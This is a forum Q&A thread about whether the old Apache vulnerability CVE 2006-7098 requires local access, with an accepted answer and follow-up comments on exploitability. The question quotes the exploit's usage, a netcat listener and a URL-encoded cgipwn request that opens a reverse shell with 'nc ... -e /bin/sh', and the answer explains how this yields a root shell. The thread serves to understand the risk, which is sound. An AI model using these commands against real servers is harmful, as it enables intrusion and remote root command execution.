# Does CVE 2006-7098 require access (being a logged in) to the vulnerable Debian?

Tags: debian, apache-httpd, vulnerability

I'm studying the vulnerabilities of an old version of Apache, the 1.3.34. And I don't quite understand in what exact situation the CVE 2006-7098 vulnerability can be exploited. The [*README*](https://www.exploit-db.com/exploits/3384/) included in the exploit states that:

> Local attacker can influence Apache to direct commands
>       into an open tty owned by user who started apache process, usually root.
>       This results in arbitrary command execution. Notes: Must have CGI execution privileges and service started manually by root via shell.
>
> Usage: *nc -vvv -l -p 31337
>       http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d*

At the beginning I understood that the vulnerability could be exploited from another machine in the same network of the vulnerable server. So from this other machine (attacker) I:

- compiled the cgipwn exploit and installed it in the cgi-bin of the
  attacker machine apache.
- executed the nc command from the attacker machine specifying -p as the port where the attacker apache listens to, *webserver* as the attacker machine IP and *myhost* as the server with the vulnerability.

But I've not succeeded: the command just doesn't return anything.

So, after rereading the exploit info several times, I've certain doubts about the phrase *local attacker*: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce a lot the applicability of the attack).

Could any body shed some light on this?

Answer (score 1, accepted):

> So, after rereading the exploit info several times, I've certain doubts about the phrase local attacker: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce a lot the applicability of the attack).

Yes, you're right.  Actually `webserver` is a target server with that vulnerability, `myhost` is an attacker's machine.

By placing `cgipwn` binary in `webserver`'s `/cgi-bin` directory and opening `http://webserver/cgi-bin/cgipwn?...`, attacker attempts to execute `nc myhost 31337 /bin/sh` on `webserver`, as a user who started Apache (usually `root`).

Attacker previously runs `nc -vvv -l -p 31337` on `myhost` so that it can accept that `nc` connection from `webserver`.  If everything goes well, attacker gets access to an interactive session of `/bin/sh` running as Apache starter user on `webserver`.

Comment: Thanks for your answer Yaegashi. If webserver is the target (vulnerable server) then the cgipwn must be first deployed in the vulnerable server. So the question is how this can be done (unless the hacker has an account with apache directory permission, it's not trivial). So, this vulnerability can only be exploited in the rare case that the hacker is an apache administrator of the target machine?

Comment: Yes, I could agree with almost everything you stated here.  So-called "*local* vulnerability/exploit" mentioned in security advisories generally has the same nature I think.  Regarding this vulnerability, because any user who can run CGI executable can attack it, I might have to rate it dangerous under such settings which are commonly seen at shared web hosting services.   However the last condition, apache process needs to run from tty (interactively by admin), is not likely true on production systems.  After all I could say this vulnerability is harmless in most situations.